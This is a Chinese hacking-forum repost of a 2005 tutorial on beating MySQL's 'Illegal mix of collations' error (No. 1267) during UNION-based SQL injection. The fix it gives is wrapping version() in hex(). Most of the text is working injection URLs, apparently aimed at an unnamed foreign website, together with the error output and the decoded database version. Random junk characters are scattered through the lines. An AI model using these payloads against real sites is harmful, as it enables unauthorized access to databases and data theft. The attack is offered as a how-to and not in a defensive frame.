找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1826|回复: 0
打印 上一主题 下一主题

MySQL注射时ErrorNo.1267的突破

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:04:54 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
本文作者:SuperHei
1 I! @! p- t1 f8 R: H文章性质:原创
" g) m& i& y/ ^9 k发布日期:2005-10-18
3 O, W0 J6 g2 t1 t4 ~, O9 H3 l测试个国外的站时:" M2 a8 s& Q2 V
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
; H4 Q; [2 d9 z5 c返回错误:
6 s8 d' C% ~) ?& I/ {: P% l; eIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'2 f# S0 y- T: m# s" |5 r
MySQL Error No. 126
) O2 |& E* ^% v, b+ Q: j5 Z4 X) [看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
1 u! O* p  Y6 X- z解决办法:转为其他编码如hex。
! l1 d! }3 s' c" y# O6 S& gurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*1 n8 N# }  z; @! `1 z
成功得到hex(version())的值为:
0 N! t4 _" `& r/ y8 F342E312E332D62657461, S" i( e1 s0 g1 B3 B
回Mysql查询下得到:3 Y% n# G- }. T0 I& `
mysql> select 0x342E312E332D62657461;' @8 J1 t8 l5 n7 I' l+ j
+------------------------+
  s) [- R3 P. j8 l4 g| 0x342E312E332D62657461 |
- c, [+ _( j: q4 p/ ?& q# S+------------------------+2 s$ X/ t6 D6 u3 m
| 4.1.3-beta |
( c+ Q8 |1 P( R2 e8 `+------------------------+
% @0 V8 K# c0 E9 r1 row in set (0.00 sec)
: c2 a& s/ _2 h+ b/ Z, B
' f. M7 l2 b( v$ F! O( N5 z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表